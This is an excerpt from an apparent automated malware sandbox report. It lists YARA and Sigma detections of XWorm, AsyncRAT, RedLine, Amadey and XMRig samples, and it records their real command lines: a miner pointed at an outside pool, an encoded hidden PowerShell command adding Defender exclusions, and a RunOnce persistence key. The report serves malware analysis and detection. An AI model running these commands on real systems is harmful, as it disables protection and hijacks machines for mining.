0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x45a08:$a1: mining.set_target 0x404e0:$a2: XMRIG_HOSTNAME 0x425b0:$a3: Usage: xmrig [OPTIONS] 0x404b8:$a4: XMRIG_VERSION
0000001A.00000002.4181122584.0000020D57868000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000025.00000002.2158620640.000002B290535000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000002.2205943039.00000209DF6F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000028.00000002.2078804630.0000018168215000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.1748882115.00000202804D0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000002.2144035452.00000209CF270000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x113e8:$s6: VirtualBox 0x11346:$s8: Win32_ComputerSystem 0x14ad3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14b70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14c85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13467:$cnc4: POST / HTTP/1.1
00000028.00000002.2065045219.0000018157F36000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.1976643095.000001D99A7E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
0000002E.00000002.4108997136.0000000140799000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000002.2205943039.00000209DF795000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000017.00000002.2051647717.000001CD18971000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 52i.exe PID: 7972	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: 52i.exe PID: 7972	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 7452	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: TypeId.exe PID: 7468	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: TypeId.exe PID: 7468	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 3736	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 8160	JoeSecurity_PersistenceViaHiddenTask	Yara detected PersistenceViaHiddenTask	Joe Security
Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 8160	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 4628	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 4628	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 4628	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xd2dff:$a1: mining.set_target 0xcecbd:$a2: XMRIG_HOSTNAME 0xcffd9:$a3: Usage: xmrig [OPTIONS] 0xcec9e:$a4: XMRIG_VERSION
Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 7032	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: YAPNXRPmcarcR4ZDgC81Tbdk.exe PID: 7156	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: SmLAztxc1o8yfogkJXrRjbDt.exe PID: 7320	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: xzzrvckwuia.exe PID: 2688	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AddInProcess.exe PID: 416	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: AddInProcess.exe PID: 416	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x96d5:$a1: mining.set_target 0x5593:$a2: XMRIG_HOSTNAME 0x68af:$a3: Usage: xmrig [OPTIONS] 0x5574:$a4: XMRIG_VERSION
Click to see the 57 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df7955a8.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18168265500.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.181682154c8.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18157f5e920.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b290535570.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28cec760.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28f455a8.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209cf255d60.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.52i.exe.202804d0000.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b29037c760.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.trSK2fqPeB.exe.1ce50324.5.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.trSK2fqPeB.exe.12b7dbd4.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.52i.exe.202f80f5ca8.12.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
15.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b2905d55a8.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df53c760.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28ea5570.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.52i.exe.202f7e9ce60.11.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.trSK2fqPeB.exe.12b7d8b0.3.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.181682154c8.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28cc4728.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b280095d60.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df514728.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b290354728.7.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.trSK2fqPeB.exe.12b7d8b0.3.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18168445570.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18168060d08.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b290354728.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd28cc4728.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df6f5570.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
37.2.IIZS2TRqf69aZbLAX3cf3edn.exe.2b280095d60.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
15.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.52i.exe.202f8055c70.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
23.2.IIZS2TRqf69aZbLAX3cf3edn.exe.1cd18870000.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf7e8:$s6: VirtualBox 0xf746:$s8: Win32_ComputerSystem 0x12ed3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12f70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13085:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11867:$cnc4: POST / HTTP/1.1
38.2.YAPNXRPmcarcR4ZDgC81Tbdk.exe.209df514728.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
40.2.SmLAztxc1o8yfogkJXrRjbDt.exe.18157f5e920.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.trSK2fqPeB.exe.12b01a78.2.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.trSK2fqPeB.exe.1ce50000.4.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x115e8:$s6: VirtualBox 0x11546:$s8: Win32_ComputerSystem 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13667:$cnc4: POST / HTTP/1.1
0.2.trSK2fqPeB.exe.1ce50324.5.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.52i.exe.202f7e74e28.8.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.52i.exe.202f7e74e28.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.trSK2fqPeB.exe.12b7dbd4.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
26.2.aspnet_compiler.exe.20d578bc530.1.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
26.2.aspnet_compiler.exe.20d578bc530.1.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4a90d8:$a1: mining.set_target 0x4a3bb0:$a2: XMRIG_HOSTNAME 0x4a5c80:$a3: Usage: xmrig [OPTIONS] 0x4a3b88:$a4: XMRIG_VERSION
26.2.aspnet_compiler.exe.20d578bc530.1.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4afba0:$x1: donate.ssl.xmrig.com 0x4b0071:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
26.2.aspnet_compiler.exe.20d578bc530.1.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b0580:$s1: %s/%s (Windows NT %lu.%lu 0x4b16b0:$s3: \\.\WinRing0_ 0x4a7e78:$s4: pool_wallet 0x4a3428:$s5: cryptonight 0x4a3438:$s5: cryptonight 0x4a3448:$s5: cryptonight 0x4a3458:$s5: cryptonight 0x4a3470:$s5: cryptonight 0x4a3480:$s5: cryptonight 0x4a3490:$s5: cryptonight 0x4a34a8:$s5: cryptonight 0x4a34b8:$s5: cryptonight 0x4a34d0:$s5: cryptonight 0x4a34e8:$s5: cryptonight 0x4a34f8:$s5: cryptonight 0x4a3508:$s5: cryptonight 0x4a3518:$s5: cryptonight 0x4a3530:$s5: cryptonight 0x4a3548:$s5: cryptonight 0x4a3558:$s5: cryptonight 0x4a3568:$s5: cryptonight
46.2.AddInProcess.exe.140000000.0.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
46.2.AddInProcess.exe.140000000.0.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
46.2.AddInProcess.exe.140000000.0.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4aa4d8:$a1: mining.set_target 0x4a4fb0:$a2: XMRIG_HOSTNAME 0x4a7080:$a3: Usage: xmrig [OPTIONS] 0x4a4f88:$a4: XMRIG_VERSION
46.2.AddInProcess.exe.140000000.0.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4b0fa0:$x1: donate.ssl.xmrig.com 0x4b1471:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
46.2.AddInProcess.exe.140000000.0.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4b1980:$s1: %s/%s (Windows NT %lu.%lu 0x4b2ab0:$s3: \\.\WinRing0_ 0x4a9278:$s4: pool_wallet 0x4a4828:$s5: cryptonight 0x4a4838:$s5: cryptonight 0x4a4848:$s5: cryptonight 0x4a4858:$s5: cryptonight 0x4a4870:$s5: cryptonight 0x4a4880:$s5: cryptonight 0x4a4890:$s5: cryptonight 0x4a48a8:$s5: cryptonight 0x4a48b8:$s5: cryptonight 0x4a48d0:$s5: cryptonight 0x4a48e8:$s5: cryptonight 0x4a48f8:$s5: cryptonight 0x4a4908:$s5: cryptonight 0x4a4918:$s5: cryptonight 0x4a4930:$s5: cryptonight 0x4a4948:$s5: cryptonight 0x4a4958:$s5: cryptonight 0x4a4968:$s5: cryptonight
26.2.aspnet_compiler.exe.20d578bc530.1.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Click to see the 55 entries

Sigma Signatures

Bitcoin Miner

Sigma detected: Xmrig

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 4628, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50, ProcessId: 416, ProcessName: AddInProcess.exe

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe, ProcessId: 8052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Cerker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE

Sigma detected: Suspicious Child Process of AspNetCompiler

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 4628, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe", ProcessId: 2688, ProcessName: xzzrvckwuia.exe

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Guid\TypeId.exe, ParentImage: C:\Users\user\AppData\Roaming\Guid\TypeId.exe, ParentProcessId: 7468, ParentProcessName: TypeId.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ProcessId: 4628, ProcessName: aspnet_compiler.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc 